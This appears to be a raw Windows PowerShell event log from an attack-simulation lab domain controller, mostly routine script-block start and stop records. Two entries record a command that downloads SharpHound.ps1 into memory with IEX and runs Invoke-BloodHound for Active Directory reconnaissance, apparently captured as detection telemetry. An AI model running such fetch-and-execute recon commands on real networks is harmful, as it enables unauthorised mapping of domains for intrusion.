SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469860
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8f35c8e3-e60d-4bc3-9ceb-3313d3bfcbd2
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469859
Keywords=None
Message=Started invocation of ScriptBlock ID: 8f35c8e3-e60d-4bc3-9ceb-3313d3bfcbd2
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469858
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 8f35c8e3-e60d-4bc3-9ceb-3313d3bfcbd2
Path:
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469857
Keywords=None
Message=Completed invocation of ScriptBlock ID: 78949942-d72e-4e98-a46a-a64dabe56d7c
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469856
Keywords=None
Message=Completed invocation of ScriptBlock ID: 07bb087f-ac29-4594-ab2e-52daaf305f0b
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469855
Keywords=None
Message=Completed invocation of ScriptBlock ID: 662a668f-f417-451a-8104-f1ba6f7ed73d
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469854
Keywords=None
Message=Started invocation of ScriptBlock ID: 662a668f-f417-451a-8104-f1ba6f7ed73d
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469853
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 662a668f-f417-451a-8104-f1ba6f7ed73d
Path:
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469852
Keywords=None
Message=Started invocation of ScriptBlock ID: 07bb087f-ac29-4594-ab2e-52daaf305f0b
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469851
Keywords=None
Message=Started invocation of ScriptBlock ID: 78949942-d72e-4e98-a46a-a64dabe56d7c
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469850
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 78949942-d72e-4e98-a46a-a64dabe56d7c
Path:
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469849
Keywords=None
Message=Started invocation of ScriptBlock ID: 93284947-297d-4766-b11c-d50f689ee72a
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469848
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7fbbfd3e-7f5f-4fa7-b953-69c6994271e7
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469847
Keywords=None
Message=Started invocation of ScriptBlock ID: 7fbbfd3e-7f5f-4fa7-b953-69c6994271e7
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469846
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2ce84cc2-72f0-4c82-8174-d307b79166cb
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469845
Keywords=None
Message=Started invocation of ScriptBlock ID: 2ce84cc2-72f0-4c82-8174-d307b79166cb
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469844
Keywords=None
Message=Completed invocation of ScriptBlock ID: 57e84c52-7cf5-48ef-a0e4-522a89070043
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469843
Keywords=None
Message=Started invocation of ScriptBlock ID: 57e84c52-7cf5-48ef-a0e4-522a89070043
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469842
Keywords=None
Message=Started invocation of ScriptBlock ID: a780fe3a-2068-433e-a4d7-8e3d9f205d74
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469841
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5}

ScriptBlock ID: a780fe3a-2068-433e-a4d7-8e3d9f205d74
Path:
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469840
Keywords=None
Message=Started invocation of ScriptBlock ID: 5c149a0a-47ad-4f5e-b54f-7b0d32c9ce8f
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469839
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5}

ScriptBlock ID: 5c149a0a-47ad-4f5e-b54f-7b0d32c9ce8f
Path:
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1469838
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1469837
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 4860 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1469836
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469835
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469834
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469833
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469832
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469831
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469830
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469829
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469828
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469827
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469826
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469825
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6305f139-1026-4489-9097-d4ceccf1ee73
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469824
Keywords=None
Message=Started invocation of ScriptBlock ID: 6305f139-1026-4489-9097-d4ceccf1ee73
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469823
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 6305f139-1026-4489-9097-d4ceccf1ee73
Path:
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469822
Keywords=None
Message=Completed invocation of ScriptBlock ID: 21ca6d5f-b596-4803-8c8d-27af84293470
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469821
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4278ab25-259b-4663-b63c-9489d693a0cd
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469893
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469892
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469891
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469890
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469889
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469888
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469887
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469886
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469885
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469884
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469883
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8c3f6269-18ff-4f02-9268-33c9c89c2532
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469882
Keywords=None
Message=Started invocation of ScriptBlock ID: 8c3f6269-18ff-4f02-9268-33c9c89c2532
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469881
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 8c3f6269-18ff-4f02-9268-33c9c89c2532
Path:
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469880
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5c149a0a-47ad-4f5e-b54f-7b0d32c9ce8f
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
